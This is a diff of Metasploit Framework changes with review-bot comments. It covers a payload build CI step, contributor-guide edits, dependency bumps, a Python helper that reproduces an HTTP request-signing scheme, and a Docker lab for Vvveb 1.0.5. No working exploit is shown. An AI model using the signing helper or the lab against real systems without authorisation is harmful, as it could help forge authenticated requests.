$r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
Write-Host $r
working-directory: metasploit-payloads
- name: Build Windows payloads via Visual Studio 2025 Build (Windows)
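Review bot: the build result is never checked in the new pwsh step. `Invoke-Command -ScriptBlock { cmd.exe /c '"...VsDevCmd.bat" && make.bat' }` returns the command's output, not its status, and `$LASTEXITCODE` is not inspected after either call, so a failing `make.bat` or a failing `git submodule update` still leaves the step green; add `if ($LASTEXITCODE -ne 0) { exit 1 }` after each call, mirroring the `$process.ExitCode` check already done for the installer. Two smaller points: `Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"` and the `--config "D:\a\..."` path hardcode the hosted-runner layout and the `Enterprise` edition, where `$env:GITHUB_WORKSPACE` (or a path relative to the step's `working-directory`) would survive a runner image change; and the bare `dir` after the first `Set-Location` looks like leftover debugging output.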
+1 -1
@@ -37,7 +37,7 @@ when an individual is representing the project or its community.
Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported by contacting the project maintainers at msfdev@metasploit.com. If
the incident involves a committer, you may report it directly to
caitlin_condon@rapid7.com or todb@metasploit.com.
smcintyre@metasploit.com or jacquelyn_harris@rapid7.com.
All complaints will be reviewed and investigated and will result in a
response that is deemed necessary and appropriate to the circumstances.
+5 -3
@@ -11,7 +11,7 @@ Before we get into the details of contributing code, you should know there are m
- [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed!
- [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality.
- [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!
- Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
- Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native English speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
## Code Contributions
@@ -25,8 +25,10 @@ will be closed. We need to ensure the code we're adding to master is written to
## Expedited Module Creation Process
We strive to respect the community that has given us so much, so in the odd situation where we get multiple submissions for the same vulnerability, generally we will work with the first person who assigns themselves to the issue or the first person that submits a good-faith PR. A good-faith PR might not even work, but it will show that the author is working their way toward a solution. Despite this general rule, there are rare circumstances where we may ask a contributor to step aside or allow a committer to take the lead on the creation of a new module if a complete and working module with documents has not already been submitted. This kind of expedited module creation process comes up infrequently, and usually it involves high-profile or high priority modules that we have marked internally as time-critical: think KEV list, active exploitation campaigns, CISA announcements, etc. In those cases, we may ask a contributor that is assigned to the issue or who has submitted an incomplete module to allow a committer to take over an issue or a module PR in the interest of getting a module out quickly. If a contributor has submitted an incomplete module, they will remain as a co-author of the module and we may build directly onto the PR they submitted, leaving the original commits in the tree. We sincerely hope that the original author will remain involved in this expedited module creation process. We would appreciate testing, critiquing, and any assistance that can be offered. If the module is complete but requires minor changes, we may ask the contributor to allow us to take over testing/verification and make these minor changes without asking so we can land the module as quickly as possible. In these cases of minor code changes, the authorship of the module will remain unchanged. We hope everyone involved in this expedited module creation process continues to feel valued and appreciated.
### Code Contribution Do's & Don'ts:
## Vibecoding, AI, and LLM
My first job had a token ring LAN and I still own a Win98SE CD, so I'm not entirely sure what _vibecoding_ is, but we're cool with any coding technique you use to create a PR as long as it is tested, documented, and does what it says it does. Untested code is incomplete code, and incomplete code should be marked as a draft PR or WIP (Work in Progress) until it is complete, tested, and ready for a committer to review. We have had several submissions clearly from AI that were well-formatted, looked really neat, and did nothing it said it did. While we have no problem with AI-assisted coding, please do not assume that the code generated by an AI or LLM is logically or even syntactically correct.
### Code Contribution Do's & Don'ts:
Keeping the following in mind gives your contribution the best chance of landing!
#### <u>Pull Requests</u>
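Review bot: the new `## Vibecoding, AI, and LLM` heading is a second-level heading inserted between `## Expedited Module Creation Process` and `### Code Contribution Do's & Don'ts:`, so the Do's & Don'ts subsection and its `#### Pull Requests` children now nest under the AI section rather than under `## Code Contributions` in the rendered outline; either demote it to `### Vibecoding, AI, and LLM` or move it after the Do's & Don'ts block. Wording nit in the new paragraph: "did nothing it said it did" should be "did nothing they said they did", since the subject is "several submissions".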
@@ -42,7 +44,7 @@ Keeping the following in mind gives your contribution the best chance of landing
* **Do** target your pull request to the **master branch**.
* **Do** specify a descriptive title to make searching for your pull request easier.
* **Do** include [console output], especially for effects that can be witnessed in the `msfconsole`.
* **Do** test your code.
* **Do** test your code and submit the test output in your PR with any sensitive information removed.
* **Do** list [verification steps] so committers can test your code.
* **Do** [reference associated issues] in your pull request description.
* **Don't** leave your pull request description blank.
+73 -67
@@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (6.4.86)
metasploit-framework (6.4.97)
aarch64
abbrev
actionpack (~> 7.2.0)
@@ -21,6 +21,7 @@ PATH
bson
chunky_png
csv
date (= 3.4.1)
dnsruby
drb
ed25519
@@ -28,7 +29,7 @@ PATH
em-http-request
eventmachine
faker
faraday (= 2.7.11)
faraday
faraday-retry
faye-websocket
ffi (< 1.17.0)
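Review bot: `faraday (= 2.7.11)` becomes a bare `faraday` in the PATH section, which means the gemspec's runtime dependency was opened to any version, including a future major release with breaking changes; if the exact pin was dropped only to resolve a conflict, a pessimistic bound such as `faraday (~> 2.7)` would keep the current major while still allowing the update.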
@@ -45,7 +46,7 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 2.0.221)
metasploit-payloads (= 2.0.235)
metasploit_data_models (>= 6.0.7)
metasploit_payloads-mettle (= 1.0.45)
mqtt
@@ -60,7 +61,7 @@ PATH
network_interface
nexpose
nokogiri
octokit (~> 4.0)
octokit
openssl-ccm
openvas-omp
ostruct
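Review bot: `octokit (~> 4.0)` becomes a bare `octokit`, dropping the upper bound; octokit has shipped several major versions beyond 4 with API changes, so resolution may now pick one the calling code was not written against. If a newer major is intended, pin to it explicitly (`~> N.0`); otherwise keep the existing bound.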
@@ -71,7 +72,7 @@ PATH
pdf-reader
pg
puma
rack
rack (~> 2.2)
railties
rasn1 (= 0.14.0)
rb-readline
@@ -96,19 +97,20 @@ PATH
rex-struct2
rex-text
rex-zip
rexml (= 3.4.1)
rinda
ruby-macho
ruby-mysql
ruby_smb (~> 3.3.15)
rubyntlm
rubyzip
sinatra
sinatra (~> 3.2)
sqlite3 (= 1.7.3)
sshkey
stringio (= 3.1.1)
swagger-blocks
syslog
thin
thin (~> 1.x)
tzinfo
tzinfo-data
unix-crypt
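Review bot: `thin (~> 1.x)` is an unusual requirement: RubyGems parses `1.x` as a version string containing a letter (a prerelease of 1), not as a wildcard, so the constraint only works by accident; write it as `~> 1.<minor>` using the version currently resolved in the GEM section. The `sinatra (~> 3.2)` pin alongside it is the conventional form.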
@@ -127,9 +129,9 @@ GEM
aarch64 (2.1.0)
racc (~> 1.6)
abbrev (0.1.2)
actionpack (7.2.2.1)
actionview (= 7.2.2.1)
activesupport (= 7.2.2.1)
actionpack (7.2.2.2)
actionview (= 7.2.2.2)
activesupport (= 7.2.2.2)
nokogiri (>= 1.8.5)
racc
rack (>= 2.2.4, < 3.2)
@@ -138,19 +140,19 @@ GEM
rails-dom-testing (~> 2.2)
rails-html-sanitizer (~> 1.6)
useragent (~> 0.16)
actionview (7.2.2.1)
activesupport (= 7.2.2.1)
actionview (7.2.2.2)
activesupport (= 7.2.2.2)
builder (~> 3.1)
erubi (~> 1.11)
rails-dom-testing (~> 2.2)
rails-html-sanitizer (~> 1.6)
activemodel (7.2.2.1)
activesupport (= 7.2.2.1)
activerecord (7.2.2.1)
activemodel (= 7.2.2.1)
activesupport (= 7.2.2.1)
activemodel (7.2.2.2)
activesupport (= 7.2.2.2)
activerecord (7.2.2.2)
activemodel (= 7.2.2.2)
activesupport (= 7.2.2.2)
timeout (>= 0.4.0)
activesupport (7.2.2.1)
activesupport (7.2.2.2)
base64
benchmark (>= 0.3)
bigdecimal
@@ -165,10 +167,10 @@ GEM
addressable (2.8.7)
public_suffix (>= 2.0.2, < 7.0)
afm (0.2.2)
allure-rspec (2.26.0)
allure-ruby-commons (= 2.26.0)
allure-rspec (2.27.0)
allure-ruby-commons (= 2.27.0)
rspec-core (>= 3.8, < 4)
allure-ruby-commons (2.26.0)
allure-ruby-commons (2.27.0)
mime-types (>= 3.3, < 4)
require_all (>= 2, < 4)
rspec-expectations (~> 3.12)
@@ -204,38 +206,38 @@ GEM
aws-sigv4 (~> 1.5)
aws-sigv4 (1.11.0)
aws-eventstream (~> 1, >= 1.0.2)
base64 (0.2.0)
base64 (0.3.0)
bcrypt (3.1.20)
bcrypt_pbkdf (1.1.1)
benchmark (0.4.1)
bigdecimal (3.2.2)
bigdecimal (3.2.3)
bindata (2.4.15)
bootsnap (1.18.4)
msgpack (~> 1.2)
bson (5.0.2)
bson (5.1.1)
builder (3.3.0)
byebug (11.1.3)
byebug (12.0.0)
chunky_png (1.4.0)
coderay (1.1.3)
concurrent-ruby (1.3.5)
connection_pool (2.5.3)
connection_pool (2.5.4)
cookiejar (0.3.4)
crass (1.0.6)
csv (3.3.2)
daemons (1.4.1)
date (3.4.1)
debug (1.10.0)
debug (1.11.0)
irb (~> 1.10)
reline (>= 0.3.8)
diff-lcs (1.6.2)
dnsruby (1.72.4)
base64 (~> 0.2.0)
logger (~> 1.6.5)
dnsruby (1.73.0)
base64 (>= 0.2)
logger (~> 1.6)
simpleidn (~> 0.2.1)
docile (1.4.1)
domain_name (0.6.20240107)
drb (2.2.3)
ed25519 (1.3.0)
ed25519 (1.4.0)
elftools (1.3.1)
bindata (~> 2)
em-http-request (1.1.7)
@@ -247,12 +249,12 @@ GEM
em-socksify (0.3.3)
base64
eventmachine (>= 1.0.0.beta.4)
erb (5.0.2)
erb (5.0.3)
erubi (1.13.1)
eventmachine (1.2.7)
factory_bot (6.5.4)
factory_bot (6.5.5)
activesupport (>= 6.1.0)
factory_bot_rails (6.5.0)
factory_bot_rails (6.5.1)
factory_bot (~> 6.5)
railties (>= 6.1.0)
faker (3.5.1)
@@ -299,7 +301,7 @@ GEM
jmespath (1.6.2)
jsobfu (0.4.2)
rkelly-remix
json (2.10.2)
json (2.15.1)
language_server-protocol (3.17.0.5)
license_finder (5.11.1)
bundler
@@ -310,7 +312,7 @@ GEM
xml-simple
lint_roller (1.1.0)
little-plugger (1.1.4)
logger (1.6.6)
logger (1.7.0)
logging (2.4.0)
little-plugger (~> 1.1)
multi_json (~> 1.14)
@@ -327,7 +329,7 @@ GEM
mutex_m
railties (~> 7.0)
zeitwerk
metasploit-credential (6.0.16)
metasploit-credential (6.0.19)
bigdecimal
csv
drb
@@ -340,7 +342,7 @@ GEM
railties
rex-socket
rubyntlm
rubyzip
rubyzip (< 3.0.0)
metasploit-model (5.0.4)
activemodel (~> 7.0)
activesupport (~> 7.0)
@@ -348,7 +350,7 @@ GEM
drb
mutex_m
railties (~> 7.0)
metasploit-payloads (2.0.221)
metasploit-payloads (2.0.235)
metasploit_data_models (6.0.9)
activerecord (~> 7.0)
activesupport (~> 7.0)
@@ -361,10 +363,10 @@ GEM
webrick
metasploit_payloads-mettle (1.0.45)
method_source (1.1.0)
mime-types (3.6.0)
mime-types (3.7.0)
logger
mime-types-data (~> 3.2015)
mime-types-data (3.2025.0304)
mime-types-data (~> 3.2025, >= 3.2025.0507)
mime-types-data (3.2025.0924)
mini_portile2 (2.8.9)
minitest (5.25.5)
mqtt (0.6.0)
@@ -388,12 +390,12 @@ GEM
network_interface (0.0.4)
nexpose (7.3.0)
nio4r (2.7.4)
nokogiri (1.18.9)
nokogiri (1.18.10)
mini_portile2 (~> 2.8.2)
racc (~> 1.4)
nori (2.7.1)
bigdecimal
octokit (4.25.1)
octokit (10.0.0)
faraday (>= 1, < 3)
sawyer (~> 0.9)
openssl-ccm (1.2.3)
@@ -403,7 +405,7 @@ GEM
packetfu (2.0.0)
pcaprub (~> 0.13.1)
parallel (1.27.0)
parser (3.3.8.0)
parser (3.3.9.0)
ast (~> 2.4.1)
racc
parslet (1.8.2)
@@ -416,24 +418,24 @@ GEM
ruby-rc4
ttfunk
pg (1.5.9)
pp (0.6.2)
pp (0.6.3)
prettyprint
prettyprint (0.2.0)
prism (1.4.0)
pry (0.14.2)
prism (1.5.1)
pry (0.15.2)
coderay (~> 1.1)
method_source (~> 1.0)
pry-byebug (3.10.1)
byebug (~> 11.0)
pry (>= 0.13, < 0.15)
pry-byebug (3.11.0)
byebug (~> 12.0)
pry (>= 0.13, < 0.16)
psych (5.2.6)
date
stringio
public_suffix (6.0.1)
public_suffix (6.0.2)
puma (6.6.0)
nio4r (~> 2.0)
racc (1.8.1)
rack (2.2.17)
rack (2.2.19)
rack-protection (3.2.0)
base64 (>= 0.1.0)
rack (~> 2.2, >= 2.2.4)
@@ -451,9 +453,9 @@ GEM
rails-html-sanitizer (1.6.2)
loofah (~> 2.21)
nokogiri (>= 1.15.7, != 1.16.7, != 1.16.6, != 1.16.5, != 1.16.4, != 1.16.3, != 1.16.2, != 1.16.1, != 1.16.0.rc1, != 1.16.0)
railties (7.2.2.1)
actionpack (= 7.2.2.1)
activesupport (= 7.2.2.1)
railties (7.2.2.2)
actionpack (= 7.2.2.2)
activesupport (= 7.2.2.2)
irb (~> 1.13)
rackup (>= 1.0.0)
rake (>= 12.2)
@@ -464,13 +466,14 @@ GEM
rasn1 (0.14.0)
strptime (~> 0.2.5)
rb-readline (0.5.5)
rdoc (6.14.2)
rdoc (6.15.0)
erb
psych (>= 4.0.0)
tsort
recog (3.1.14)
nokogiri
redcarpet (3.6.1)
regexp_parser (2.10.0)
regexp_parser (2.11.3)
reline (0.6.2)
io-console (~> 0.5)
require_all (3.0.0)
@@ -487,9 +490,11 @@ GEM
metasm
rex-arch
rex-text
rex-exploitation (0.1.41)
rex-exploitation (0.1.44)
bigdecimal
jsobfu
metasm
racc
rex-arch
rex-encoder
rex-text
@@ -506,7 +511,7 @@ GEM
rex-random_identifier
rex-text
ruby-rc4
rex-random_identifier (0.1.20)
rex-random_identifier (0.1.21)
bigdecimal
rex-text
rex-registry (0.1.6)
@@ -532,7 +537,7 @@ GEM
forwardable
ipaddr
rkelly-remix (0.0.7)
rspec (3.13.0)
rspec (3.13.1)
rspec-core (~> 3.13.0)
rspec-expectations (~> 3.13.0)
rspec-mocks (~> 3.13.0)
@@ -544,7 +549,7 @@ GEM
rspec-mocks (3.13.5)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.13.0)
rspec-rails (8.0.1)
rspec-rails (8.0.2)
actionpack (>= 7.2)
activesupport (>= 7.2)
railties (>= 7.2)
@@ -554,7 +559,7 @@ GEM
rspec-support (~> 3.13)
rspec-rerun (1.1.0)
rspec (~> 3.0)
rspec-support (3.13.4)
rspec-support (3.13.6)
rubocop (1.75.7)
json (~> 2.3)
language_server-protocol (~> 3.17.0.2)
@@ -566,7 +571,7 @@ GEM
rubocop-ast (>= 1.44.0, < 2.0)
ruby-progressbar (~> 1.7)
unicode-display_width (>= 2.4.0, < 4.0)
rubocop-ast (1.44.1)
rubocop-ast (1.47.1)
parser (>= 3.3.7.2)
prism (~> 1.4)
ruby-macho (4.1.0)
@@ -618,15 +623,16 @@ GEM
timeout (0.4.3)
toml (0.2.0)
parslet (~> 1.8.0)
tsort (0.2.0)
ttfunk (1.8.0)
bigdecimal (~> 3.1)
tzinfo (2.0.6)
concurrent-ruby (~> 1.0)
tzinfo-data (1.2025.1)
tzinfo (>= 1.0.0)
unicode-display_width (3.1.4)
unicode-emoji (~> 4.0, >= 4.0.4)
unicode-emoji (4.0.4)
unicode-display_width (3.2.0)
unicode-emoji (~> 4.1)
unicode-emoji (4.1.0)
unix-crypt (1.3.1)
useragent (0.16.11)
warden (1.2.9)
+46 -45
@@ -2,15 +2,15 @@ This file is auto-generated by tools/dev/update_gem_licenses.sh
Ascii85, 2.0.1, MIT
aarch64, 2.1.0, "Apache 2.0"
abbrev, 0.1.2, "ruby, Simplified BSD"
actionpack, 7.2.2.1, MIT
actionview, 7.2.2.1, MIT
activemodel, 7.2.2.1, MIT
activerecord, 7.2.2.1, MIT
activesupport, 7.2.2.1, MIT
actionpack, 7.2.2.2, MIT
actionview, 7.2.2.2, MIT
activemodel, 7.2.2.2, MIT
activerecord, 7.2.2.2, MIT
activesupport, 7.2.2.2, MIT
addressable, 2.8.7, "Apache 2.0"
afm, 0.2.2, MIT
allure-rspec, 2.26.0, "Apache 2.0"
allure-ruby-commons, 2.26.0, "Apache 2.0"
allure-rspec, 2.27.0, "Apache 2.0"
allure-ruby-commons, 2.27.0, "Apache 2.0"
arel-helpers, 2.16.0, MIT
ast, 2.4.3, MIT
aws-eventstream, 1.3.2, "Apache 2.0"
@@ -23,41 +23,41 @@ aws-sdk-kms, 1.99.0, "Apache 2.0"
aws-sdk-s3, 1.182.0, "Apache 2.0"
aws-sdk-ssm, 1.191.0, "Apache 2.0"
aws-sigv4, 1.11.0, "Apache 2.0"
base64, 0.2.0, "ruby, Simplified BSD"
base64, 0.3.0, "ruby, Simplified BSD"
bcrypt, 3.1.20, MIT
bcrypt_pbkdf, 1.1.1, MIT
benchmark, 0.4.1, "ruby, Simplified BSD"
bigdecimal, 3.2.2, "ruby, Simplified BSD"
bigdecimal, 3.2.3, "ruby, Simplified BSD"
bindata, 2.4.15, "Simplified BSD"
bootsnap, 1.18.4, MIT
bson, 5.0.2, "Apache 2.0"
bson, 5.1.1, "Apache 2.0"
builder, 3.3.0, MIT
bundler, 2.5.22, MIT
byebug, 11.1.3, "Simplified BSD"
byebug, 12.0.0, "Simplified BSD"
chunky_png, 1.4.0, MIT
coderay, 1.1.3, MIT
concurrent-ruby, 1.3.5, MIT
connection_pool, 2.5.3, MIT
connection_pool, 2.5.4, MIT
cookiejar, 0.3.4, "Simplified BSD"
crass, 1.0.6, MIT
csv, 3.3.2, "ruby, Simplified BSD"
daemons, 1.4.1, MIT
date, 3.4.1, "ruby, Simplified BSD"
debug, 1.10.0, "ruby, Simplified BSD"
debug, 1.11.0, "ruby, Simplified BSD"
diff-lcs, 1.6.2, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
dnsruby, 1.72.4, "Apache 2.0"
dnsruby, 1.73.0, "Apache 2.0"
docile, 1.4.1, MIT
domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
drb, 2.2.3, "ruby, Simplified BSD"
ed25519, 1.3.0, MIT
ed25519, 1.4.0, MIT
elftools, 1.3.1, MIT
em-http-request, 1.1.7, MIT
em-socksify, 0.3.3, MIT
erb, 5.0.2, "ruby, Simplified BSD"
erb, 5.0.3, "ruby, Simplified BSD"
erubi, 1.13.1, MIT
eventmachine, 1.2.7, "ruby, GPL-2.0"
factory_bot, 6.5.4, MIT
factory_bot_rails, 6.5.0, MIT
factory_bot, 6.5.5, MIT
factory_bot_rails, 6.5.1, MIT
faker, 3.5.1, MIT
faraday, 2.7.11, MIT
faraday-net_http, 3.0.2, MIT
@@ -83,27 +83,27 @@ ipaddr, 1.2.7, "ruby, Simplified BSD"
irb, 1.15.2, "ruby, Simplified BSD"
jmespath, 1.6.2, "Apache 2.0"
jsobfu, 0.4.2, "New BSD"
json, 2.10.2, ruby
json, 2.15.1, ruby
language_server-protocol, 3.17.0.5, MIT
license_finder, 5.11.1, MIT
lint_roller, 1.1.0, MIT
little-plugger, 1.1.4, MIT
logger, 1.6.6, "ruby, Simplified BSD"
logger, 1.7.0, "ruby, Simplified BSD"
logging, 2.4.0, MIT
loofah, 2.24.1, MIT
lru_redux, 1.1.0, MIT
memory_profiler, 1.1.0, MIT
metasm, 1.0.5, LGPL-2.1
metasploit-concern, 5.0.5, "New BSD"
metasploit-credential, 6.0.16, "New BSD"
metasploit-framework, 6.4.86, "New BSD"
metasploit-credential, 6.0.19, "New BSD"
metasploit-framework, 6.4.97, "New BSD"
metasploit-model, 5.0.4, "New BSD"
metasploit-payloads, 2.0.221, "3-clause (or ""modified"") BSD"
metasploit-payloads, 2.0.235, "3-clause (or ""modified"") BSD"
metasploit_data_models, 6.0.9, "New BSD"
metasploit_payloads-mettle, 1.0.45, "3-clause (or ""modified"") BSD"
method_source, 1.1.0, MIT
mime-types, 3.6.0, MIT
mime-types-data, 3.2025.0304, MIT
mime-types, 3.7.0, MIT
mime-types-data, 3.2025.0924, MIT
mini_portile2, 2.8.9, MIT
minitest, 5.25.5, MIT
mqtt, 0.6.0, MIT
@@ -121,59 +121,59 @@ net-ssh, 7.3.0, MIT
network_interface, 0.0.4, MIT
nexpose, 7.3.0, "New BSD"
nio4r, 2.7.4, "MIT, Simplified BSD"
nokogiri, 1.18.9, MIT
nokogiri, 1.18.10, MIT
nori, 2.7.1, MIT
octokit, 4.25.1, MIT
octokit, 10.0.0, MIT
openssl-ccm, 1.2.3, MIT
openssl-cmac, 2.0.2, MIT
openvas-omp, 0.0.4, MIT
ostruct, 0.6.1, "ruby, Simplified BSD"
packetfu, 2.0.0, "New BSD"
parallel, 1.27.0, MIT
parser, 3.3.8.0, MIT
parser, 3.3.9.0, MIT
parslet, 1.8.2, MIT
patch_finder, 1.0.2, "New BSD"
pcaprub, 0.13.3, LGPL-2.1
pdf-reader, 2.14.1, MIT
pg, 1.5.9, "Simplified BSD"
pp, 0.6.2, "ruby, Simplified BSD"
pp, 0.6.3, "ruby, Simplified BSD"
prettyprint, 0.2.0, "ruby, Simplified BSD"
prism, 1.4.0, MIT
pry, 0.14.2, MIT
pry-byebug, 3.10.1, MIT
prism, 1.5.1, MIT
pry, 0.15.2, MIT
pry-byebug, 3.11.0, MIT
psych, 5.2.6, MIT
public_suffix, 6.0.1, MIT
public_suffix, 6.0.2, MIT
puma, 6.6.0, "New BSD"
racc, 1.8.1, "ruby, Simplified BSD"
rack, 2.2.17, MIT
rack, 2.2.19, MIT
rack-protection, 3.2.0, MIT
rack-session, 1.0.2, MIT
rack-test, 2.2.0, MIT
rackup, 1.0.1, MIT
rails-dom-testing, 2.3.0, MIT
rails-html-sanitizer, 1.6.2, MIT
railties, 7.2.2.1, MIT
railties, 7.2.2.2, MIT
rainbow, 3.1.1, MIT
rake, 13.3.0, MIT
rasn1, 0.14.0, MIT
rb-readline, 0.5.5, BSD
rdoc, 6.14.2, ruby
rdoc, 6.15.0, ruby
recog, 3.1.14, unknown
redcarpet, 3.6.1, MIT
regexp_parser, 2.10.0, MIT
regexp_parser, 2.11.3, MIT
reline, 0.6.2, ruby
require_all, 3.0.0, MIT
rex-arch, 0.1.18, "New BSD"
rex-bin_tools, 0.1.10, "New BSD"
rex-core, 0.1.34, "New BSD"
rex-encoder, 0.1.8, "New BSD"
rex-exploitation, 0.1.41, "New BSD"
rex-exploitation, 0.1.44, "New BSD"
rex-java, 0.1.8, "New BSD"
rex-mime, 0.1.11, "New BSD"
rex-nop, 0.1.4, "New BSD"
rex-ole, 0.1.9, "New BSD"
rex-powershell, 0.1.103, "New BSD"
rex-random_identifier, 0.1.20, "New BSD"
rex-random_identifier, 0.1.21, "New BSD"
rex-registry, 0.1.6, "New BSD"
rex-rop_builder, 0.1.6, "New BSD"
rex-socket, 0.1.62, "New BSD"
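Review bot: `recog, 3.1.14, unknown` in the context lines still records an unknown licence in the generated manifest; since the header says the file is produced by `tools/dev/update_gem_licenses.sh`, the fix belongs in that script's licence mapping (or the recog gemspec) rather than in a hand edit here.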
@@ -184,15 +184,15 @@ rex-zip, 0.1.6, "New BSD"
rexml, 3.4.1, "Simplified BSD"
rinda, 0.2.0, "ruby, Simplified BSD"
rkelly-remix, 0.0.7, MIT
rspec, 3.13.0, MIT
rspec, 3.13.1, MIT
rspec-core, 3.13.5, MIT
rspec-expectations, 3.13.5, MIT
rspec-mocks, 3.13.5, MIT
rspec-rails, 8.0.1, MIT
rspec-rails, 8.0.2, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.13.4, MIT
rspec-support, 3.13.6, MIT
rubocop, 1.75.7, MIT
rubocop-ast, 1.44.1, MIT
rubocop-ast, 1.47.1, MIT
ruby-macho, 4.1.0, MIT
ruby-mysql, 4.2.0, MIT
ruby-prof, 1.7.2, "Simplified BSD"
@@ -221,11 +221,12 @@ tilt, 2.6.0, MIT
timecop, 0.9.10, MIT
timeout, 0.4.3, "ruby, Simplified BSD"
toml, 0.2.0, MIT
tsort, 0.2.0, "ruby, Simplified BSD"
ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
tzinfo, 2.0.6, MIT
tzinfo-data, 1.2025.1, MIT
unicode-display_width, 3.1.4, MIT
unicode-emoji, 4.0.4, MIT
unicode-display_width, 3.2.0, MIT
unicode-emoji, 4.1.0, MIT
unix-crypt, 1.3.1, 0BSD
useragent, 0.16.11, MIT
warden, 1.2.9, MIT
+1 -1
@@ -7,7 +7,7 @@ require File.expand_path('../boot', __FILE__)
require 'action_view'
# Monkey patch https://github.com/rails/rails/blob/v7.2.2.1/actionview/lib/action_view/helpers/tag_helper.rb#L51
# Might be fixed by 8.x https://github.com/rails/rails/blob/v8.0.2/actionview/lib/action_view/helpers/tag_helper.rb#L51C1-L52C1
raise unless ActionView::VERSION::STRING == '7.2.2.1' # A developer will need to ensure this is still required when bumping rails
raise unless ActionView::VERSION::STRING == '7.2.2.2' # A developer will need to ensure this is still required when bumping rails
module ActionView::Helpers::TagHelper
class TagBuilder
def self.define_element(name, code_generator:, method_name: name.to_s.underscore)
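Review bot: the guard `raise unless ActionView::VERSION::STRING == '7.2.2.2'` is bumped, but the comment above it still links to `v7.2.2.1/.../tag_helper.rb#L51`; update the URL to the v7.2.2.2 tag and confirm that the monkey patch of `TagBuilder.define_element` is still needed at that version, which is exactly what the trailing comment asks a developer to do on every Rails bump.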
@@ -0,0 +1,88 @@
import hashlib
import re
import argparse
import sys
from urllib.parse import urlsplit, parse_qs, unquote, quote
from typing import Dict, List, Tuple
_SIGNATURE_REGEX = re.compile(r'[^A-Za-z0-9/?_.=&{}\[\]":, -]')
def compute_signature(method: str, path: str, body: str = '', key: str = '') -> str:
if not method or not path:
raise ValueError("Method and path must be provided.")
url_parts = urlsplit(path)
base_path = url_parts.path
if not base_path.startswith('/'):
base_path = '/' + base_path
raw_query_params: Dict[str, List[str]] = parse_qs(
url_parts.query, keep_blank_values=True, strict_parsing=False
)
canonical_query: List[Tuple[str, str]] = []
for k, v_list in raw_query_params.items():
if k == '_signature':
continue
value = unquote(v_list[0]) if v_list else ''
canonical_query.append((k, value))
canonical_query.sort(key=lambda item: item[0])
query_string = '&'.join(f"{k}={quote(v)}" for k, v in canonical_query)
if query_string:
canonical_path = f"{base_path}?{query_string}"
else:
canonical_path = base_path
canonical_path = re.sub(_SIGNATURE_REGEX, '-', canonical_path)
body_for_signing = re.sub(_SIGNATURE_REGEX, '-', body)
if not key:
password_hash = "da39a3ee5e6b4b0d3255bfef95601890afd80709"
else:
password_hash = hashlib.sha1(key.encode('utf-8')).hexdigest().lower()
data = f"{method.upper()}:{canonical_path}:{body_for_signing}:{password_hash}"
return hashlib.sha1(data.encode('utf-8')).hexdigest().lower()
def main():
parser = argparse.ArgumentParser(description="Computes a SHA1 signature for an HTTP request.")
parser.add_argument('--method', type=str, required=True,
choices=['GET', 'POST', 'PUT', 'DELETE'],
help="The HTTP method (e.g., GET).")
parser.add_argument('--path', type=str, required=True,
help="The canonical path (e.g., /api/resource?param=value).")
parser.add_argument('--key', type=str, default='',
help="The secret key. Defaults to an empty string.")
parser.add_argument('--body', type=str, default='',
help="The request body as a string. Defaults to an empty string.")
try:
args = parser.parse_args()
signature = compute_signature(
method=args.method,
path=args.path,
body=args.body,
key=args.key
)
print(f"Computed Signature: {signature}")
except ValueError as e:
sys.stderr.write(f"Error: {e}\n")
sys.exit(1)
except Exception as e:
sys.stderr.write(f"An unexpected error occurred: {e}\n")
sys.exit(1)
if __name__ == '__main__':
main()
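Review bot: `compute_signature` double-decodes query values: `parse_qs` already percent-decodes, so `unquote(v_list[0])` decodes a second time and a value such as `%2541` canonicalises differently from a server that decodes once; only the first value of a repeated key is signed as well. The `if not key` branch is redundant, since `hashlib.sha1(b'').hexdigest()` already yields `da39a3ee5e6b4b0d3255bfef95601890afd80709`; drop the hard-coded constant. A module docstring naming the product and request-signing scheme this reproduces would also help the next maintainer.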
+25
@@ -0,0 +1,25 @@
FROM php:8.3-fpm
RUN apt-get clean && apt-get update && \
apt-get install -y \
wget unzip \
libicu-dev \
libfreetype6-dev \
libjpeg62-turbo-dev \
libxml2-dev \
libwebp-dev \
libpng-dev \
libzip-dev \
libonig-dev \
libcurl4-openssl-dev && \
docker-php-ext-configure gd --with-webp --with-jpeg && \
docker-php-ext-install -j$(nproc) gd xml dom curl mbstring intl gettext zip mysqli && \
pecl install apcu && docker-php-ext-enable apcu && \
rm -rf /var/lib/apt/lists/*
WORKDIR /var/www/html
RUN wget https://github.com/givanz/Vvveb/releases/download/1.0.5/latest.zip && \
unzip latest.zip && rm latest.zip
COPY php.ini /usr/local/etc/php/php.ini
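Review bot: the release archive is fetched with `wget` and unpacked without any integrity check; pinning to tag 1.0.5 is good, but verifying the download against a recorded digest (`sha256sum -c`) is what makes the lab image reproducible. Minor: `apt-get clean` before `apt-get update` is a no-op.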
@@ -0,0 +1,43 @@
services:
php:
build: .
container_name: vvveb-php
volumes:
- vvveb_html:/var/www/html
networks:
- vvveb-net
nginx:
image: nginx:stable
container_name: vvveb-nginx
ports:
- "8080:80"
volumes:
- ./nginx.conf:/etc/nginx/conf.d/default.conf
- vvveb_html:/var/www/html:ro
depends_on:
- php
